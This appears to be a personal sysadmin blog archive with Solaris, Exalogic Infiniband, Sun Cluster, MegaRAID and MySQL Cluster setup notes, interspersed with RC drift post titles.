Archive for 'Sok Tau' Category






install packages from the Solaris 10 installer DVD:
=======================================
– SUNWs8brandr
– SUNWs8brandu

# lofiadm -a /source/solaris10-u13_sparc.iso
# mount -F hsfs /dev/lofi/1 /mnt
# cd /mnt/Solaris_10/Product/
# pkgadd -d . SUNWs8brandr
# pkgadd -d . SUNWs8brandu

 

install the solaris8 container / template patch
=======================================
- download the patch for Solaris 8 SPARC, 11702874 (p11702874_800_SOLARIS64.zip)
- extract it:

# unzip p11702874_800_SOLARIS64.zip
# gunzip s8containers-bundle-solaris10-sparc.tar.gz
# tar xf s8containers-bundle-solaris10-sparc.tar
# cd  s8containers-bundle/1.0.1/Product/
# pkgadd -d . SUNWs8brandk

 

setup / install the zone

# zonecfg -z solaris8
solaris8: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:solaris8> create -t SUNWsolaris8            <--- -t=template
zonecfg:solaris8> set zonepath=/zones/solaris8
zonecfg:solaris8> set autoboot=true
zonecfg:solaris8> add net
zonecfg:solaris8:net> set address=X.X.X.X 
zonecfg:solaris8:net> set physical=e1000g1
zonecfg:solaris8:net> end
zonecfg:solaris8> verify
zonecfg:solaris8> commit
zonecfg:solaris8> exit
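The interactive session above can also be captured in a command file and fed to zonecfg non-interactively — a sketch, keeping the X.X.X.X address placeholder as-is:

```shell
# write the zonecfg commands to a file (values taken from the session above;
# X.X.X.X stays a placeholder for the real address)
cat > /tmp/solaris8.cfg <<'EOF'
create -t SUNWsolaris8
set zonepath=/zones/solaris8
set autoboot=true
add net
set address=X.X.X.X
set physical=e1000g1
end
verify
commit
EOF
# on the target host, apply it with:  zonecfg -z solaris8 -f /tmp/solaris8.cfg
```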
 
# zoneadm -z solaris8 install -u -a /path/to/the/extracted/patch/s8-s8zone.flar
 
# zoneadm list -cv
  ID NAME             STATUS     PATH                           BRAND    IP
   0 global           running    /                              native   shared
   - solaris8         installed  /zones/solaris8                solaris8 shared
 
# zoneadm -z solaris8 boot

 

configure zone via console

# zlogin -C -e % solaris8


Trunking Infiniband

  ozzie / 01/09/2014

Infiniband trunking on Exalogic

set trunk mode on the Catalyst port

catalystXX> enable
catalystXX# configure terminal 
Enter configuration commands, one per line.  End with CNTL/Z.
catalystXX(config)# interface Gi0/2
catalystXX(config-if)# switchport mode trunk

 

configure VLAN @ infiniband switch

# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        0    0xffff
 
# createvlan 0A-ETH-1 -VLAN 193 -PKEY default
# createvlan 0A-ETH-1 -VLAN 195 -PKEY default
# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        195  0xffff
   0A-ETH-1        193  0xffff
   0A-ETH-1        0    0xffff

 

setup vnic @ compute-node

# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
 
# dladm create-vnic -l net7 -v 193 vnic0
# dladm create-vnic -l net8 -v 193 vnic1
# dladm create-vnic -l net7 -v 195 vnic2
# dladm create-vnic -l net8 -v 195 vnic3
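The four create-vnic calls follow one pattern (two IB links x two VLANs); a dry-run loop that prints the same commands, handy if more VLANs get added later:

```shell
# print the create-vnic commands for every (VLAN, link) pair; nothing is executed
cmds=$(
  i=0
  for vid in 193 195; do
    for link in net7 net8; do
      echo "dladm create-vnic -l $link -v $vid vnic$i"
      i=$((i+1))
    done
  done
)
printf '%s\n' "$cmds"
```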
 
# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:44:aa:9f   random            0
net0e1              net8         10000  2:8:20:58:8b:7d   random            0
vnic0               net7         10000  2:8:20:f0:60:62   random            193
vnic1               net8         10000  2:8:20:f2:c6:e    random            193
vnic2               net7         10000  2:8:20:5e:f6:63   random            195
vnic3               net8         10000  2:8:20:f9:fb:d2   random            195

 

assign vnic for solaris container @ compute-node

# zonecfg -z solariszone1
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic0
zonecfg:solariszone1:net> end
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic1
zonecfg:solariszone1:net> end
zonecfg:solariszone1> verify
zonecfg:solariszone1> commit
zonecfg:solariszone1> exit
 
# zoneadm -z solariszone1 reboot
 
# zonecfg -z solariszone2
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic2
zonecfg:solariszone2:net> end
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic3
zonecfg:solariszone2:net> end
zonecfg:solariszone2> verify
zonecfg:solariszone2> commit
zonecfg:solariszone2> exit
 
# zoneadm -z solariszone2 reboot

 

verify vnic compute-node

# dladm  show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
vnic0               net7         10000  2:8:20:f2:8e:41   random            193
solariszone1/vnic0  net7         10000  2:8:20:f2:8e:41   random            193
vnic1               net8         10000  2:8:20:be:ce:6c   random            193
solariszone1/vnic1  net8         10000  2:8:20:be:ce:6c   random            193
vnic2               net7         10000  2:8:20:3c:88:32   random            195
solariszone2/vnic2  net7         10000  2:8:20:3c:88:32   random            195
vnic3               net8         10000  2:8:20:69:fb:dc   random            195
solariszone2/vnic3  net8         10000  2:8:20:69:fb:dc   random            195


Problem:
when switching the resource group to another node:

# clrg switch -n kambing1 kambing-rg
clrg:  (C748634) Resource group kambing-rg failed to start on chosen node and might fail over to other node(s)
 
# metaset 
# metaset -s kandang-data
metaset: kambing1: setname "kandang-data": no such set
 
# metaset -s kandang-apps
metaset: kambing1: setname "kandang-apps": no such set

shut down kambing1 (init 0) and leave it at the ok prompt;

 

- remove the kambing1 host from the disksets, run from kambing2:

# metaset -s kandang-apps -d -f -h kambing1
# metaset -s kandang-data -d -f -h kambing1

*this process takes quite a while.. let it time out

 
reboot kambing1 and re-add it from kambing2:

# metaset -s kandang-data -a -h kambing1
# metaset -s kandang-apps  -a -h kambing1

check the metasets on kambing1.. then switch the resource group between the nodes;

enjooyyy <:-p



Nyasar lagi #x

  ozzie / 19/05/2014

Nyasar Medan

  ozzie / 06/05/2014

Nyasar party lagi

  ozzie / 04/04/2014

Nyasar Banjarmasin

  ozzie / 28/03/2014

Solaris 11 AI

  ozzie / 27/02/2014

download the Solaris 11 AI ISO:

# installadm create-service -s /export/home/ozzie/sol-11_1-ai-sparc.iso
Warning: Service svc:/network/dns/multicast:default is not online.
   Installation services will not be advertised via multicast DNS.
 
Creating service from: /export/home/ozzie/sol-11_1-ai-sparc.iso
OK to use subdir of /export/auto_install to store image? [y/N]: Y
Setting up the image ...
 
Creating sparc service: solaris11_1-sparc
 
Image path: /export/auto_install/solaris11_1-sparc
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
Refreshing install services
Warning: mDNS registry of service solaris11_1-sparc could not be verified.
 
Creating default-sparc alias
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
No local DHCP configuration found. This service is the default
alias for all SPARC clients. If not already in place, the following should
be added to the DHCP configuration:
Boot file: http://ip-installserver:5555/cgi-bin/wanboot-cgi
 
Refreshing install services
Warning: mDNS registry of service default-sparc could not be verified.

generate a system configuration profile:

# sysconfig create-profile -o /var/tmp/client_sc.xml


# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient
# installadm list -p
Service/Profile Name  Criteria
--------------------  --------
default-sparc
   sclient            None

 

# installadm export -n default-sparc -m orig_default -o /var/tmp/OZ.xml
# cat /var/tmp/OZ.xml
<!DOCTYPE auto_install SYSTEM "file:///usr/share/install/ai.dtd.1">
<auto_install>
  <ai_instance name="OZ">
    <target>
      <logical>
        <zpool name="rpool" is_root="true">
          <!--
            Subsequent <filesystem> entries instruct an installer to create
            following ZFS datasets:
 
                <root_pool>/export         (mounted on /export)
                <root_pool>/export/home    (mounted on /export/home)
 
            Those datasets are part of standard environment and should be
            always created.
 
            In rare cases, if there is a need to deploy an installed system
            without these datasets, either comment out or remove <filesystem>
            entries. In such scenario, it has to be also assured that
            in case of non-interactive post-install configuration, creation
            of initial user account is disabled in related system
            configuration profile. Otherwise the installed system would fail
            to boot.
          -->
          <filesystem name="export" mountpoint="/export"/>
          <filesystem name="export/home"/>
          <be name="solaris"/>
        </zpool>
      </logical>
    </target>
    <software type="IPS">
      <destination>
        <image>
          <!-- Specify locales to install -->
          <facet set="false">facet.locale.*</facet>
          <facet set="true">facet.locale.de</facet>
          <facet set="true">facet.locale.de_DE</facet>
          <facet set="true">facet.locale.en</facet>
          <facet set="true">facet.locale.en_US</facet>
          <facet set="true">facet.locale.es</facet>
          <facet set="true">facet.locale.es_ES</facet>
          <facet set="true">facet.locale.fr</facet>
          <facet set="true">facet.locale.fr_FR</facet>
          <facet set="true">facet.locale.it</facet>
          <facet set="true">facet.locale.it_IT</facet>
          <facet set="true">facet.locale.ja</facet>
          <facet set="true">facet.locale.ja_*</facet>
          <facet set="true">facet.locale.ko</facet>
          <facet set="true">facet.locale.ko_*</facet>
          <facet set="true">facet.locale.pt</facet>
          <facet set="true">facet.locale.pt_BR</facet>
          <facet set="true">facet.locale.zh</facet>
          <facet set="true">facet.locale.zh_CN</facet>
          <facet set="true">facet.locale.zh_TW</facet>
        </image>
      </destination>
      <source>
        <publisher name="solaris">
          <origin name="http://10.10.2.12:9000"/>
        </publisher>
      </source>
      <!--
        The version specified by the "entire" package below, is
        installed from the specified IPS repository.  If another build
        is required, the build number should be appended to the
        'entire' package in the following form:
 
            <name>pkg:/entire@0.5.11-0.build#</name>
      -->
      <software_data action="install">
        <name>pkg:/entire@0.5.11-0.175.1</name>
        <name>pkg:/group/system/solaris-large-server</name>
      </software_data>
    </software>
  </ai_instance>
</auto_install>
 
# installadm create-manifest -n default-sparc -f /var/tmp/OZ.xml   -m OZ -d
# installadm list -n default-sparc  -m
Service/Manifest Name  Status   Criteria
---------------------  ------   --------
default-sparc
   client2             Default  None
   orig_default        Inactive None

 

create local repository

# mount -F hsfs /export/repoSolaris11/sol-11-repo-full.iso /mnt 
# rsync -aP /mnt/repo/ /export/repoSolaris11 
# pkgrepo -s /export/repoSolaris11 refresh 
# svccfg -s application/pkg/server setprop pkg/inst_root=/export/repoSolaris11 
# svccfg -s application/pkg/server setprop pkg/readonly=true 
# svccfg -s application/pkg/server setprop pkg/port=9000 
# svcadm refresh application/pkg/server 
# svcadm enable application/pkg/server

 

booting <:-p

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.d, 16256 MB memory available, Serial #XXXXXXXX
Ethernet address 0:21:28:3f:7a:c4, Host ID: XXXXXX
 
 
 
{0} ok setenv network-boot-arguments  host-ip=client-IP,router-ip=router-ip,subnet-mask=mask-value,hostname=client-name,file=wanbootCGI-URL
{0} ok boot net - install
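The network-boot-arguments string is easy to mistype at the ok prompt; it can be assembled and eyeballed in a shell first (every value below is a placeholder):

```shell
# build the OBP network-boot-arguments value from placeholder variables
HOSTIP=192.168.1.10 ROUTER=192.168.1.1 MASK=255.255.255.0
CLIENT=client1 CGI=http://installserver:5555/cgi-bin/wanboot-cgi
BOOTARGS="host-ip=$HOSTIP,router-ip=$ROUTER,subnet-mask=$MASK,hostname=$CLIENT,file=$CGI"
echo "setenv network-boot-arguments $BOOTARGS"
```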


RCdriftprix series round 2

  ozzie / 10/02/2014




RCdriftprix series round 2 | MGK 9-Feb-2014



RCdriftprix series round 1

  ozzie / 13/01/2014
# /opt/MegaRaid/LSI/MegaCli  -LDInfo -Lall -aALL
Adapter 0 -- Virtual Drive Information:
Virtual Drive: 0 (Target Id: 0)
Name                :
RAID Level          : Primary-1, Secondary-0, RAID Level Qualifier-0
Size                : 278.464 GB
Sector Size         : 512
Mirror Data         : 278.464 GB
State               : Degraded
Strip Size          : 64 KB
Number Of Drives    : 2
Span Depth          : 1
Default Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Current Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Default Access Policy: Read/Write
Current Access Policy: Read/Write
Disk Cache Policy   : Disk's Default
Encryption Type     : None
Is VD Cached: Yes
Cache Cade Type : Read Only
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
Adapter #0
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 6
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(bad)
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli -PDMakeGood -physDrv [252:0] -a0                
Adapter: 0: EnclId-252 SlotId-0 state changed to Unconfigured-Good.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL                           
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 7
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(good), Spun Up
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli -PDReplaceMissing -physDrv [252:0] -a0

 

# /opt/MegaRaid/LSI/MegaCli -PDOnline -physDrv [252:0] -a0
 
EnclId-252 SlotId-0 state changed to OnLine.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
 
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Drive's position: DiskGroup: 0, Span: 0, Arm: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 9
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :27C (80.60 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
 
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
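The recovery above boils down to three MegaCli state changes run in order; a dry-run that only prints the commands (adapter and drive address as in the outputs above):

```shell
# print the three-step recovery sequence; drop the echo to actually run it
MEGACLI=/opt/MegaRaid/LSI/MegaCli
DRV='[252:0]'
plan=$(for op in PDMakeGood PDReplaceMissing PDOnline; do
  echo "$MEGACLI -$op -physDrv $DRV -a0"
done)
printf '%s\n' "$plan"
```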


RCDI Final 2013

  ozzie / 08/12/2013


Seasons City Mall – 8 dec 2013



Sarinah Never Sleeps 2013

  ozzie / 07/12/2013

Drift lagi…

  ozzie / 21/10/2013

new experience

  ozzie / 14/10/2013

ozzienich

MGK kemayoran, 13-Oct-2013



RC Drift

  ozzie / 11/10/2013

Compiling sysbench @ Solaris-10 SPARC

  ozzie / 05/10/2013

a bit of documentation, since so many attempts to install SYSBENCH on Solaris fail, especially on the SPARC architecture :D

with these basic ingredients:

 
1. make sure Solaris Studio is ready

# export PATH=$PATH:/opt/solarisstudio/bin

 
2. extract, build & install m4

# cd m4-1.4.17/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
3. update path binary executable

# export PATH=$PATH:/opt/app/bin

 
4. extract, build & install autoconf

# cd autoconf-2.69/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
5. extract, build & install automake

# cd automake-1.14
# ./configure --prefix=/opt/app
checking whether make supports nested variables... yes
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... lib/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... lib/install-sh -c -d
..
..
# make
# make install
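Steps 2, 4 and 5 are the same configure/make/install dance; as a dry-run loop over the three source trees (versions as above), printing the sequence without running it:

```shell
# print the identical build sequence for each toolchain package; nothing is run
build=$(for pkg in m4-1.4.17 autoconf-2.69 automake-1.14; do
  echo "cd $pkg && ./configure --prefix=/opt/app && make && make install"
done)
printf '%s\n' "$build"
```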

 
6. extract, build & install sysbench
edit the configure.ac file

# cd sysbench-0.4.12
# vi configure.ac



change AC_PROG_LIBTOOL to AC_PROG_RANLIB:

# Checks for programs.
AC_PROG_CC
AC_PROG_LIBTOOL



becomes

# Checks for programs.
AC_PROG_CC
AC_PROG_RANLIB
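The same one-line change can be done with sed instead of vi; the sketch below works on a sample copy so the real configure.ac can be inspected before replacing it:

```shell
# demonstrate the swap on a sample copy; on the real tree, run sed on configure.ac
printf '# Checks for programs.\nAC_PROG_CC\nAC_PROG_LIBTOOL\n' > /tmp/configure.ac.sample
sed 's/AC_PROG_LIBTOOL/AC_PROG_RANLIB/' /tmp/configure.ac.sample > /tmp/configure.ac.new
cat /tmp/configure.ac.new
```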


 

# ./configure  --prefix=/opt/sysbench CFLAGS=-m64
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking target system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... config/install-sh -c
checking whether build environment is sane... yes
..
..
# make 
# make install

 
now let's benchmark MySQL Enterprise OLTP. <:-p <:-p
how do the results look?? :>



RC Drift

  ozzie / 11/09/2013

Playing & learning.. so we don't end up as cowardly TRASH adding to Jakarta's traffic jams



MySQL Cluster

  ozzie / 09/07/2013

MySQL Cluster @ Solaris 10.
node1 [10.0.5.41]: nDB, Sql, Management
node2 [10.0.5.42]: nDB, Sql
node3 [10.0.5.43]: nDB, Sql


since this is just for development, the config & datadir directory structure is placed under /apps

# ls /apps
config
ndb_data
mysql_data

# cat /apps/config/config.ini 
[TCP DEFAULT]
 
[NDB_MGMD DEFAULT]
Datadir=/apps/ndb_data/
 
[NDB_MGMD]
NodeId=1
Hostname=10.0.5.41
 
[NDBD DEFAULT]
NoOfReplicas=2
Datadir=/apps/ndb_data/
 
[NDBD]
Hostname=10.0.5.41
 
[NDBD]
Hostname=10.0.5.42
 
[NDBD]
Hostname=10.0.5.43
 
[MYSQLD]
[MYSQLD]
[MYSQLD]

# cat /apps/config/my.cnf 
[MYSQLD]
ndbcluster
ndb-connectstring=10.0.5.41
datadir=/apps/mysql_data
socket=/tmp/mysql.sock
user=mysql
 
[MYSQLD_SAFE]
log-error=/apps/mysqld.log
pid-file=/apps/mysqld.pid
 
[MYSQL_CLUSTER]
ndb-connectstring=10.0.5.41

Execute @ node1: # /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini --configdir=/apps/config/ --initial

# /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini  --configdir=/apps/config/
MySQL Cluster Management Server mysql-5.5.30 ndb-7.2.12
bash-3.2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2 (not connected, accepting connect from 10.0.5.41)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

exec @ node1: # /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf

# /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-09 23:58:44 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-09 23:58:44 [ndbd] INFO     -- Angel allocated nodeid: 2
 
# ndb_mgm -e show        
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, starting, Nodegroup: 0)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

execute @ node2 & node3: # /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf

#  /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-10 00:01:50 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-10 00:01:50 [ndbd] INFO     -- Angel allocated nodeid: 3

check from the cluster management client:

# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)
ndb_mgm>

Execute on all nodes:

# /opt/mysql/mysql/scripts/mysql_install_db --defaults-file=/apps/config/my.cnf \
 --user=mysql --datadir=/apps/mysql_data --basedir=/opt/mysql/mysql
 
# /opt/mysql/mysql/bin/mysqld_safe --defaults-extra-file=/apps/config/my.cnf &

# ndb_mgm -e show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
id=6    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12)
id=7    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12)

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
